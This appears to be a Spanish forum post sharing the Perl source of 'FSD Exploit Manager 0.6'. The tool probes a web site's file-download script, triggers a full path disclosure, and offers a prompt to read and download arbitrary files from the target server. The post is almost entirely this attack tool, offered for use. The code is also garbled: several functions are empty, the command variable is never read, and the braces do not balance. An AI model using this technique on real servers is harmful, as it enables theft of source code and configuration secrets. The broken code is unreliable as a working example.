El codigo :
#!usr/bin/perl #FSD Exploit Manager 0.6 #(C) Doddy Hackman 2014 use Getopt::Long; use Color::Output; Color::Output::Init; use LWP::UserAgent; use File::Basename; use Cwd; my $nave = LWP::UserAgent->new(); $nave->timeout(5); installer(); GetOptions( "scan=s" => \$scan, "fpd" => \$fpd, "logs" => \$logs, "open" => \$open ); head(); if ($scan) { my $page = $scan; printear("\n[+] Scanning target : "); my ( $scheme, $auth, $path, $query, $frag ) = uri_split($page); my $me = basename($path); $code1 = toma( $page . $me ); if ( $code1 =~ /header\((.*)Content-Disposition: attachment;/ig ) { printear_titulo("[+] Vulnerable\n"); $code2 = toma( $page . "'" ); if ( $code2 =~ /No such file or directory in <b>(.*)<\/b> on line/ or $code2 =~ /No existe el fichero o el directorio in <b>(.*)<\/b> on line/ ) { my $ruta = $1; my $cambiar = basename($ruta); $ruta =~ s/$cambiar//; my $prompt = ""; if ($fpd) { printear("\n[+] Full Path Dislocure Detect : "); $prompt = "[" . $ruta . "] > "; } else { $prompt = "[prompt] > "; } unless ( -d $auth ) { } printear("\n[+] File Downloader : "); while (1) { $SIG{INT} = \&adios; printear_titulo( "\n" . $prompt ); if ( $comando =~ /!exit/ ) { adios(); } elsif ( $comando =~ /!read_file (.*)/ ) { my $archivo = $1; my $code = ""; my $code = toma( $page . $archivo ); printear_logo( "\n----------------------------------------------------\n" ); printear_titulo($code); printear_logo( "\n----------------------------------------------------\n" ); } elsif ( $comando =~ /!download_file (.*)/ ) { my $archivo = $1; my $nombre = basename($archivo); printear_titulo("\n[+] Downloading file : "); if ( $nave->mirror( $page . $archivo, $nombre ) ) { printear("\n[+] File Downloaded\n"); if ($open) { my $abrir = getcwd() . "/" . $nombre; if ( -f $abrir ) { abrir_archivo($abrir); } if ( -f $abrir ) { } } } } else { printear("\n[-] File not downloaded\n"); } } elsif ( $comando =~ /!help/ ) { printear( "\n[+] Commands : " . "\n\n" ); printear("!download_file <file> : Download file\n"); printear("!read_file <file> : Read File\n"); printear("!help : Show commands\n"); printear("!exit : To exit the program\n"); } else { printear("\n[-] Command not found , try using !help\n"); } } } } else { printear_titulo("[-] Not vulnerable\n"); } } else { sintax(); } copyright(); sub abrir_archivo { my $os = $^O; if ( $os =~ /Win32/ig ) { } else { } } sub printear { cprint( "\x036" . $_[0] . "\x030" ); } sub printear_logo { cprint( "\x037" . $_[0] . "\x030" ); } sub printear_titulo { cprint( "\x0310" . $_[0] . "\x030" ); } sub sintax { printear("\n[+] Sintax : "); printear("\n[+] Options : \n\n"); printear("\n[+] Example : "); copyright(); } sub installer { unless ( -d "fsdlogs/" ) { } } sub adios { printear_titulo("\n\n[+] Good Bye\n"); copyright(); } sub head { printear_logo("\n-- == FSD Exploit Manager 0.6 == --\n\n"); } sub copyright { printear_logo("\n\n-- == (C) Doddy Hackman 2014 == --\n"); } sub toma { } #The End ?
Un video con ejemplos de uso :
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